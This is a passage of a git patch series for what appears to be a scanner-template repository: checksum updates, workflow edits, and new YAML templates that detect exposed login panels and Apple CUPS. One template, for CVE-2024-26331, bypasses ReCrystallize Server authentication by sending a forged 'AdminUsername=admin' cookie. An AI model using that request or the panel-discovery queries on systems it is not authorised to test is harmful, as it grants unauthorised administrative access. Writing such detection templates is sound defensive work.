-cloud/aws/ec2/ec2-unrestricted-dns.yaml:e85f5e12cacd03aef746be046e300965c00c55a0 -cloud/aws/ec2/ec2-unrestricted-ftp.yaml:6721a5a7d9f6dbd25b8bb9687598f750521ad843 -cloud/aws/ec2/ec2-unrestricted-http.yaml:2ce2bd62f138c0c219d75706ef8715f3d8e55442 -cloud/aws/ec2/ec2-unrestricted-https.yaml:6f1e3f4929c57208a2fdf0e0132e5b05a00c98a9 -cloud/aws/ec2/ec2-unrestricted-icmp.yaml:c6b2185195af30a2970f18f3995bd1bdf308aa86 -cloud/aws/ec2/ec2-unrestricted-memcached.yaml:77f5706a7d083d530663ca7832e2f0a4bd72ffa8 -cloud/aws/ec2/ec2-unrestricted-mongodb.yaml:3be4f2a5acd2e6d762a0b1d805d69186138eac9c -cloud/aws/ec2/ec2-unrestricted-mssql.yaml:a2ff7df3965b4d55654f5a27911031da00e916dd -cloud/aws/ec2/ec2-unrestricted-mysql.yaml:cd0755920deb9b4b57f381cd052e492443f5e989 -cloud/aws/ec2/ec2-unrestricted-netbios.yaml:cecf5b775a8f587fe8f0a762242b1e2b6ed5e692 -cloud/aws/ec2/ec2-unrestricted-opensearch.yaml:5de6c18696849db4d04e092b564fd3a0ecc101c2 -cloud/aws/ec2/ec2-unrestricted-oracle.yaml:4a6242b67eb867653dd733b684e1e60e341b82c2 -cloud/aws/ec2/ec2-unrestricted-pgsql.yaml:566fbd24c670edbbff7ac6c8039bf3ad769486ac -cloud/aws/ec2/ec2-unrestricted-rdp.yaml:0593a520daa4ec2f82bc5c261b398b8787f6295e -cloud/aws/ec2/ec2-unrestricted-redis.yaml:02da2ac4999a095297a454ef03ab02afa95a0930 -cloud/aws/ec2/ec2-unrestricted-smtp.yaml:a7429d56ea3619eac45d1470cd4788726b2cb259 -cloud/aws/ec2/ec2-unrestricted-ssh.yaml:a1b144b3576cdb29cdda749e616130e084e35f9b -cloud/aws/ec2/ec2-unrestricted-telnet.yaml:04c878646b18c6dd5e92f32c3955accd2fbef0ae -cloud/aws/ec2/publicly-shared-ami.yaml:2fcebb823e956f5ff7f30a5899c1fb6b5460d7e0 -cloud/aws/ec2/unencrypted-aws-ami.yaml:e341f420f029d37e97f5957aaae219467c83b870 -cloud/aws/iam/iam-access-analyzer.yaml:2febbd9f72f5483bb7a8f2fc7d85c7354da919a7 -cloud/aws/iam/iam-expired-ssl.yaml:c836a639a4d9f446293fe65c4c5b157fc502ec8d -cloud/aws/iam/iam-full-admin-privileges.yaml:ceb406cd832ca3a3b5afbb58c846390162b4fae5 -cloud/aws/iam/iam-key-rotation-90days.yaml:bc39146f138a821f7de458a30553541aec3bbf39 -cloud/aws/iam/iam-mfa-enable.yaml:0a6c35888c629cbad01c5e5e7e04eab92bffa6ea -cloud/aws/iam/iam-password-policy.yaml:8279cb55e5195c5ebd717c89f27d25e8b4327302 -cloud/aws/iam/iam-root-mfa.yaml:798752274ff9964961ac647906497dbcc4505aad -cloud/aws/iam/iam-ssh-keys-rotation.yaml:80a262969239d7efa462adea360156ed59b77c9b -cloud/aws/iam/iam-unapproved-policy.yaml:d2ffab2fb0dfc4e1af85c5465f98e3c8eac1fbaf -cloud/aws/iam/iam-user-password-change.yaml:2a381f0499fa8c89656aac939b61acdd11e8eb1c -cloud/aws/iam/ssl-cert-renewal.yaml:2ed7722671084aab03c742b68475ce16a7a96484 -cloud/aws/rds/aurora-copy-tags-snap.yaml:2110bbdb4f0de1d0e3718657de3fdc7c0e9a1109 -cloud/aws/rds/aurora-delete-protect.yaml:a9eb733cb1cdb4e07ed06e5bfc0a4a2df450bfd9 -cloud/aws/rds/iam-db-auth.yaml:37cefaa7c44d8c50ef6c6957abd673cc115d10d5 -cloud/aws/rds/rds-backup-enable.yaml:3c85e156129947c42e69ae8fe601e1026246f6c9 -cloud/aws/rds/rds-deletion-protection.yaml:b4f839b97c6693a3f8a3a8b5560e3ad7412cef21 -cloud/aws/rds/rds-encryption-check.yaml:b0eb1992d627f797057aed00ec5c226b6949c5d5 -cloud/aws/rds/rds-event-notify.yaml:339783b59d708d8ae00eca2a16cfdd1e99f9ab48 -cloud/aws/rds/rds-event-sub-enable.yaml:e91cc96f53a4f0d2d6573a0b3a41ee6d49e9aa2d -cloud/aws/rds/rds-event-sub.yaml:189bc0618ac15c3bb0664440faf5180f9431958a -cloud/aws/rds/rds-gp-ssd-usage.yaml:2d269a5a8c87e6854da558950e9435630654e244 -cloud/aws/rds/rds-public-snapshot.yaml:e4c2a324e72dd9cd72d9201d757f3eed7223a125 -cloud/aws/rds/rds-public-subnet.yaml:adbb20aabfed8a753a00632689a240c03e8cd020 -cloud/aws/rds/rds-ri-payment-fail.yaml:19ebf1299ee12a88a061b445cfba6c03e9f044ed -cloud/aws/rds/rds-snapshot-encryption.yaml:4448aa27aeca2be101f93a4e7a9023f06ecce651 -cloud/aws/s3/s3-access-logging.yaml:19d5013388f1d4781306c7e47d541af79d73381f -cloud/aws/s3/s3-auth-fullcontrol.yaml:4014f2e289f1dcbf01d375353c4f1c1989ce8b94 -cloud/aws/s3/s3-bucket-key.yaml:d4da38370c0e40719da8ca9aa301a419ba23d295 -cloud/aws/s3/s3-bucket-policy-public-access.yaml:b4a26fde262094bcaa384cff667ed9c3aae3e205 -cloud/aws/s3/s3-mfa-delete-check.yaml:5983fc34760be48fbb866685eddd6e2320b0d247 -cloud/aws/s3/s3-public-read-acp.yaml:62544635240f00bc7ace0ac4dbd6de7d0381d609 -cloud/aws/s3/s3-public-read.yaml:2a7aeb01d2763be92763c39cce1b80710248462e -cloud/aws/s3/s3-public-write-acp.yaml:efafd212c0b75c0da6c54aa72510efaaff4c53cb -cloud/aws/s3/s3-public-write.yaml:cee70dd8a93169b3fc7b6a82ed37fc3da14bffe7 -cloud/aws/s3/s3-server-side-encryption.yaml:dc60e48d675a3c1c76dd45c70d704a1e9910b526 -cloud/aws/s3/s3-versioning.yaml:3133440829b4ad9d9b1fb886a92dddc52be83cea -cloud/aws/vpc/nacl-open-inbound.yaml:980f4649de7dc9094526bab9dab0097b7cd40b7d -cloud/aws/vpc/nacl-outbound-restrict.yaml:4e9c1ebe9779bb6bf009d9aeb6f7183767df5583 -cloud/aws/vpc/nat-gateway-usage.yaml:79bac47ea9133e661e8fd081eea1942a0c91b393 -cloud/aws/vpc/unrestricted-admin-ports.yaml:45fa41da051ab0de22d2686cbf89c8b0d46fd7e2 -cloud/aws/vpc/vpc-endpoint-exposed.yaml:8d3cb1e55172b4e9026de18c13cfdcf2f5a895c7 -cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:d9fa33d62bfeba287467547c7e9483c7920e89d2 -cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:8dfa165e2f46bdc33706f3b3502ebf16d92c283e -cloud/aws/vpc/vpn-tunnel-down.yaml:251082b46098453e492ba6003dc3b1bca385b607 +cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f +cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 +cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 +cloud/aws/acm/acm-cert-validation.yaml:891b15ef24fe616c05b41fdae8242b8bacbcf423 +cloud/aws/acm/acm-wildcard-cert.yaml:f4d73e68c35f053f380fd062dc7b71cdbc060750 +cloud/aws/aws-code-env.yaml:3c7eeaeac960521b0547497edaa44d469ab58203 +cloud/aws/cloudtrail/cloudtrail-data-events.yaml:f6857df8f5cbc5a10ee7725198a2b02b3cac501a +cloud/aws/cloudtrail/cloudtrail-disabled.yaml:0db02de4f3982841322b13d05639c827243eac5c +cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c736d53 +cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 +cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 +cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:8c6cf3eeb8314189731e7c5925fb8f3b9057f278 +cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea +cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 +cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 +cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:2047446aa3af9e434021c99613c80934822674cd +cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:ed584c7d7d5243de717f7405fa56524eb9b68f8e +cloud/aws/cloudwatch/cw-alarm-action-set.yaml:13a6734ecaf4c832f0ca3b090bffc12c6e13ccea +cloud/aws/cloudwatch/cw-alarms-actions.yaml:0b41499c8dc66fc8f2b595ebb1ee4413ed3df085 +cloud/aws/ec2/ec2-imdsv2.yaml:dedb60f2627758fd64f4e823be5c5b45e45f5eab +cloud/aws/ec2/ec2-public-ip.yaml:bba5b508db8d775685d79ae9e99c67c2a3d76e03 +cloud/aws/ec2/ec2-sg-egress-open.yaml:714d210f9edcb41bfa504c4a13645244f780c7fc +cloud/aws/ec2/ec2-sg-ingress.yaml:81e2d4f7083463db4b213fe9ac342471a1410ad9 +cloud/aws/ec2/ec2-unrestricted-cifs.yaml:7eabd6e954f8d0070f2b5f51fd484a61ccd5aced +cloud/aws/ec2/ec2-unrestricted-dns.yaml:28b9a572c9620e84a77538311fe8d5e285b60fff +cloud/aws/ec2/ec2-unrestricted-ftp.yaml:c2bca6e54611f703c31298bb5ad5f21a8f21cb8a +cloud/aws/ec2/ec2-unrestricted-http.yaml:732c9bb88f8052e7aa95835eee62f87a0b16ddaa +cloud/aws/ec2/ec2-unrestricted-https.yaml:7ea389c02de13d72b9ba7750026da8a8c52a86a9 +cloud/aws/ec2/ec2-unrestricted-icmp.yaml:511f1efb4d2a047d9401475c9bab3f0fe1f8686a +cloud/aws/ec2/ec2-unrestricted-memcached.yaml:80c09f2ca4e5fae4b06aec30519592745a2651bc +cloud/aws/ec2/ec2-unrestricted-mongodb.yaml:3c2a25e08e3554eb01db64e859b82be8adfda45a +cloud/aws/ec2/ec2-unrestricted-mssql.yaml:71ce799db9bc59890d49b6692c050a4e5563efc6 +cloud/aws/ec2/ec2-unrestricted-mysql.yaml:c9ed5296b8151d2a2edb0d50768425cce23feb15 +cloud/aws/ec2/ec2-unrestricted-netbios.yaml:c33018e1545df10e65f562aa2ab4a2ca05ccf938 +cloud/aws/ec2/ec2-unrestricted-opensearch.yaml:996b3a27227b3db26965ada192a613db5dfa719b +cloud/aws/ec2/ec2-unrestricted-oracle.yaml:22bf7a30e4fd9c7f8f88157722518c8a71abe217 +cloud/aws/ec2/ec2-unrestricted-pgsql.yaml:6b9c96061660d70553762c6e06def179d07e8de6 +cloud/aws/ec2/ec2-unrestricted-rdp.yaml:9429f5ac9754a5c9c222de547a047b34fc3d6164 +cloud/aws/ec2/ec2-unrestricted-redis.yaml:900da1c9b31742203eda75afd776c3741bf4d3f8 +cloud/aws/ec2/ec2-unrestricted-smtp.yaml:e0e56306e511d708334ff997489e4351104028a9 +cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33 +cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a +cloud/aws/ec2/publicly-shared-ami.yaml:1151ecc81064e141e9efde1368d4749b35065364 +cloud/aws/ec2/unencrypted-aws-ami.yaml:477dd2aa6f1ddf8846ccd874096cfdf8787b3e35 +cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9 +cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8 +cloud/aws/iam/iam-full-admin-privileges.yaml:2955b6c197acfac1f2c5a70fe9f69ac287863652 +cloud/aws/iam/iam-key-rotation-90days.yaml:f7f4a4b8f836227020221d3102e70437d3f20b5e +cloud/aws/iam/iam-mfa-enable.yaml:4cc722d5aab1bfd029cebd23aef12ccbc9711a04 +cloud/aws/iam/iam-password-policy.yaml:0c0198bd8d1a51bb19a33eaca3eb0e0084ddb229 +cloud/aws/iam/iam-root-mfa.yaml:5b82c6ccd615779185fd186e0a7c0455c02340fc +cloud/aws/iam/iam-ssh-keys-rotation.yaml:4b15b7f525519172f3ce3d7ba4eabb9c2b530560 +cloud/aws/iam/iam-unapproved-policy.yaml:883cdcaea84c6970f6f99cc3289ffc2ed85bbac1 +cloud/aws/iam/iam-user-password-change.yaml:99ffdaecc6bb1aa4200a5853b703163276a1b2af +cloud/aws/iam/ssl-cert-renewal.yaml:40622e59896e04627695c6d286e0015aaed13010 +cloud/aws/rds/aurora-copy-tags-snap.yaml:24cdac257293625e8dc1c0239caf3ee7d0c51e98 +cloud/aws/rds/aurora-delete-protect.yaml:204588cae0f19c39376a6e74287d4df5d384d7ab +cloud/aws/rds/iam-db-auth.yaml:d1efbfb4d23f7b406fc2fd7a0555399f958a16ac +cloud/aws/rds/rds-backup-enable.yaml:d6ea933f3e4aa18ec835f424b4dec8a209e3cd52 +cloud/aws/rds/rds-deletion-protection.yaml:bdff9fb15d819b0de48f2c4c5ff9a941154032fd +cloud/aws/rds/rds-encryption-check.yaml:b4832d4c4fe440f61f3ff1cb9525153320f14ffd +cloud/aws/rds/rds-event-notify.yaml:03998790659d38696b70b1f3e6c64c6dffccc7a2 +cloud/aws/rds/rds-event-sub-enable.yaml:10469f43441c8414c199458f88524419275a187b +cloud/aws/rds/rds-event-sub.yaml:f83dba6f60062de8a3accc50ed6ef2e83aca9e67 +cloud/aws/rds/rds-gp-ssd-usage.yaml:08cf1e2b4c7fcc2f78aa73f2b47d107023df259e +cloud/aws/rds/rds-public-snapshot.yaml:64d174a5801b03fecb919f35e4a09457c63b85f6 +cloud/aws/rds/rds-public-subnet.yaml:f521f7086ad9c715bf4dfab136a8bd5d535c93a5 +cloud/aws/rds/rds-ri-payment-fail.yaml:367cae7258f5a082dbff4168b15ae288527242c9 +cloud/aws/rds/rds-snapshot-encryption.yaml:12260c9aa3a91078b974f79bd0f051f85b8986dd +cloud/aws/s3/s3-access-logging.yaml:596c721b62e1158cd205f20c5e27a7b9212a5212 +cloud/aws/s3/s3-auth-fullcontrol.yaml:6f79caf71bab7ec1ed77903bfae883a928436432 +cloud/aws/s3/s3-bucket-key.yaml:6dfed7abf1b5641d40fb43fb20c7ea982e8ecd9f +cloud/aws/s3/s3-bucket-policy-public-access.yaml:822fe635c69581edbb60e8d7d8e55531b2bb15cd +cloud/aws/s3/s3-mfa-delete-check.yaml:f38a32e9e9644cc061c53cfa92005a27982f1023 +cloud/aws/s3/s3-public-read-acp.yaml:8689176e409be79d1a188f3dd05bc1de7369be45 +cloud/aws/s3/s3-public-read.yaml:f6087d960c9e9b1a59183cef5ab73bab7ce44dfe +cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39 +cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e +cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24 +cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a +cloud/aws/vpc/nacl-open-inbound.yaml:c37fc3d3cf8f958463cc9866508ae592b443f45f +cloud/aws/vpc/nacl-outbound-restrict.yaml:2bf48e55f84c699328d7b6fa817ddaeeb2dd0bd1 +cloud/aws/vpc/nat-gateway-usage.yaml:1be291e02105543d5dd3e21ab16ad934f0378fdc +cloud/aws/vpc/unrestricted-admin-ports.yaml:9ff885af43ee0f899f553eca7ede2dad946d9b7e +cloud/aws/vpc/vpc-endpoint-exposed.yaml:b92e7486a3d12b8e7852462749cb2367100d9bf1 +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:b9a8f1c8578f6fa44a539f3f728f7166a71923b3 +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e579ae244c162e6fa5b27348290079e1c9a5008 +cloud/aws/vpc/vpn-tunnel-down.yaml:5151f54f14688d396709d5c2d16c3c7b087e2d4b cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a @@ -3457,6 +3457,7 @@ http/exposed-panels/aircube-login.yaml:ebe4b1486285bc388b1443ca13d40e396024cc08 http/exposed-panels/airflow-panel.yaml:73fca507f0b290fdb254039de606513276d0c5ad http/exposed-panels/airnotifier-panel.yaml:af0fe72034df681134b3c2e39ed53f135f127082 http/exposed-panels/akamai-cloudtest.yaml:34911ca7d2b6bd5816b4def55d62ce0bb0b4ce76 +http/exposed-panels/akhq-panel.yaml:16813688806be518e506078936f602ad2ce388ff http/exposed-panels/alfresco-detect.yaml:75f184462b0163274cb8cd4c4a2bf32282d481a1 http/exposed-panels/alienvault-usm.yaml:3b8b0250f6fbc636d0c3f3ed1e7fa3a4b77f798d http/exposed-panels/allied-telesis-exposure.yaml:064666baf2b7dceaa0f1efff7f8713eb5d10ea3f @@ -8398,7 +8399,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:386dc69e1aa09c8b4730de162313199553be014b +templates-checksum.txt:0e39b0a79b60a51eb82e802f2d27dba125379550 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 77f3a92c3ec3630a19aff7c8bb6e8a28646755b1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 11 Apr 2024 15:05:13 +0000 Subject: [PATCH 0047/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 73ef158280..42fefa2ebe 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -101,6 +101,7 @@ on: - 'http/default-logins/asus/asus-rtn16-default-login.yaml' - 'http/default-logins/asus/asus-wl500g-default-login.yaml' - 'http/default-logins/asus/asus-wl520GU-default-login.yaml' + - 'http/exposed-panels/akhq-panel.yaml' - 'http/exposed-panels/beyondtrust-priv-panel.yaml' - 'http/exposed-panels/mitel-micollab-panel.yaml' - 'http/exposed-panels/mitric-checker-panel.yaml' From 1dd3635124d589a6438eef3c7624094223142dbf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Apr 2024 15:06:25 +0000 Subject: [PATCH 0048/1768] Auto Template Signing [Thu Apr 11 15:06:25 UTC 2024] :robot: --- http/exposed-panels/akhq-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/akhq-panel.yaml b/http/exposed-panels/akhq-panel.yaml index 601ae98921..96b73b692c 100644 --- a/http/exposed-panels/akhq-panel.yaml +++ b/http/exposed-panels/akhq-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100ec6dcf22744fe11b073c76193c1101676961f537db177ed1e8c68e8db7ae4adf022051967e71d2b3724e4c89e33efba8dfc512fccb40444a30a5ee8be51b4d4ba295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4ed1e6ff8a8b09ddec0bf0816ddbd305dc1530a7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 11 Apr 2024 22:06:45 +0530 Subject: [PATCH 0049/1768] Create apple-cups-exposure.yaml --- .../misconfiguration/apple-cups-exposure.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/apple-cups-exposure.yaml diff --git a/http/misconfiguration/apple-cups-exposure.yaml b/http/misconfiguration/apple-cups-exposure.yaml new file mode 100644 index 0000000000..cd23df9e7c --- /dev/null +++ b/http/misconfiguration/apple-cups-exposure.yaml @@ -0,0 +1,31 @@ +id: apple-cups-exposure + +info: + name: Apple CUPS Sources - Exposure + author: DhiyaneshDK + severity: high + description: | + Apple CUPS Sources was exposed. + reference: + - https://github.com/apple/cups + metadata: + verified: true + max-request: 1 + shodan-query: html:"Home - CUPS" + tags: apple,cups,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "Home \\- CUPS ([0-9.]+)<\\/title>" + + - type: status + status: + - 200 From fe52ebd685c592b74a824635c649fb63c48cd968 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 11 Apr 2024 22:21:57 +0530 Subject: [PATCH 0050/1768] Create powerchute-network-panel.yaml --- .../powerchute-network-panel.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/powerchute-network-panel.yaml diff --git a/http/exposed-panels/powerchute-network-panel.yaml b/http/exposed-panels/powerchute-network-panel.yaml new file mode 100644 index 0000000000..6ed468f0e8 --- /dev/null +++ b/http/exposed-panels/powerchute-network-panel.yaml @@ -0,0 +1,27 @@ +id: powerchute-network-panel + +info: + name: PowerChute Network Shutdown - Panel + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: html:"PowerChute Network Shutdown" + tags: panel,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>PowerChute Network Shutdown" + + - type: status + status: + - 200 From 68858a73b067e5f638629b4fc3fe4affb4eeae37 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Apr 2024 04:44:05 +0530 Subject: [PATCH 0051/1768] Create ni-web-based-panel.yaml --- http/exposed-panels/ni-web-based-panel.yaml | 27 +++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/ni-web-based-panel.yaml diff --git a/http/exposed-panels/ni-web-based-panel.yaml b/http/exposed-panels/ni-web-based-panel.yaml new file mode 100644 index 0000000000..06a711db40 --- /dev/null +++ b/http/exposed-panels/ni-web-based-panel.yaml @@ -0,0 +1,27 @@ +id: ni-web-based-panel + +info: + name: NI Web-based Configuration & Monitoring - Panel + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"NI Web-based Configuration & Monitoring" + tags: detect,ni,web-based,panel + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "NI Web-based Configuration & Monitoring" + + - type: status + status: + - 200 From ac6ceb262906acdd90d0913fe4674b4639a23d70 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Apr 2024 04:47:30 +0530 Subject: [PATCH 0052/1768] trail space fix --- http/exposed-panels/ni-web-based-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/ni-web-based-panel.yaml b/http/exposed-panels/ni-web-based-panel.yaml index 06a711db40..327567c517 100644 --- a/http/exposed-panels/ni-web-based-panel.yaml +++ b/http/exposed-panels/ni-web-based-panel.yaml @@ -14,7 +14,7 @@ http: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word From 2159dd0a4872f241ce96ddb69b85db00ee223523 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Apr 2024 04:48:06 +0530 Subject: [PATCH 0053/1768] Create rtm-web-panel.yaml --- http/exposed-panels/rtm-web-panel.yaml | 27 ++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/rtm-web-panel.yaml diff --git a/http/exposed-panels/rtm-web-panel.yaml b/http/exposed-panels/rtm-web-panel.yaml new file mode 100644 index 0000000000..c0522984d7 --- /dev/null +++ b/http/exposed-panels/rtm-web-panel.yaml @@ -0,0 +1,27 @@ +id: rtm-web-panel + +info: + name: RTM WEB - Panel + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: "RTM WEB" + tags: panel,login,rtm-web + +http: + - method: GET + path: + - "{{BaseURL}}/Login" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "RTM WEB" + + - type: status + status: + - 200 From d5165791fb22438572e84b42818b52bc434fe5ab Mon Sep 17 00:00:00 2001 From: carsonchan12345 <44266907+carsonchan12345@users.noreply.github.com> Date: Fri, 12 Apr 2024 14:10:17 +0800 Subject: [PATCH 0054/1768] CVE-2024-26331 --- http/cves/2024/CVE-2024-26331_.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 http/cves/2024/CVE-2024-26331_.yaml diff --git a/http/cves/2024/CVE-2024-26331_.yaml b/http/cves/2024/CVE-2024-26331_.yaml new file mode 100644 index 0000000000..68dd37b93e --- /dev/null +++ b/http/cves/2024/CVE-2024-26331_.yaml @@ -0,0 +1,25 @@ +id: CVE-2024-26331 +info: + name: ReCrystallize Server Authentication Bypass via Cookie Manipulation + author: Carson Chan + severity: high + reference: https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + description: This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. +http: + - method: GET + path: + - "{{BaseURL}}/Admin/Admin.aspx" + headers: + Cookie: "AdminUsername=admin" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "ReCrystallize Server Administration" + - "License Status:" + - "Fully Licensed." + part: body From 2e0b033d6612f689344f64311e4d379db6ee6452 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 12 Apr 2024 06:52:57 +0000 Subject: [PATCH 0055/1768] Auto Generated Templates Checksum [Fri Apr 12 06:52:57 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 162eee780c..7f3827b05f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3457,7 +3457,7 @@ http/exposed-panels/aircube-login.yaml:ebe4b1486285bc388b1443ca13d40e396024cc08 http/exposed-panels/airflow-panel.yaml:73fca507f0b290fdb254039de606513276d0c5ad http/exposed-panels/airnotifier-panel.yaml:af0fe72034df681134b3c2e39ed53f135f127082 http/exposed-panels/akamai-cloudtest.yaml:34911ca7d2b6bd5816b4def55d62ce0bb0b4ce76 -http/exposed-panels/akhq-panel.yaml:16813688806be518e506078936f602ad2ce388ff +http/exposed-panels/akhq-panel.yaml:225c16f11b7c067a4c58ffdb85bd9f67bb34c044 http/exposed-panels/alfresco-detect.yaml:75f184462b0163274cb8cd4c4a2bf32282d481a1 http/exposed-panels/alienvault-usm.yaml:3b8b0250f6fbc636d0c3f3ed1e7fa3a4b77f798d http/exposed-panels/allied-telesis-exposure.yaml:064666baf2b7dceaa0f1efff7f8713eb5d10ea3f @@ -4035,6 +4035,7 @@ http/exposed-panels/nexus-panel.yaml:4719ca26f8ca0070fa2329b344b10e6d27ce8ffc http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174961 http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5 http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af +http/exposed-panels/ni-web-based-panel.yaml:75a812d014e56f8e0d6cd245bdc3ef149f1a2c38 http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814 http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3 http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8 @@ -8399,7 +8400,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0e39b0a79b60a51eb82e802f2d27dba125379550 +templates-checksum.txt:5e9ee80cc6c2f498bbcf32743578c497411761d5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8acdf694a3f547026276ce9fd598373db29b2547 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 12 Apr 2024 06:53:05 +0000 Subject: [PATCH 0056/1768] Auto Generated New Template Addition List [Fri Apr 12 06:53:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 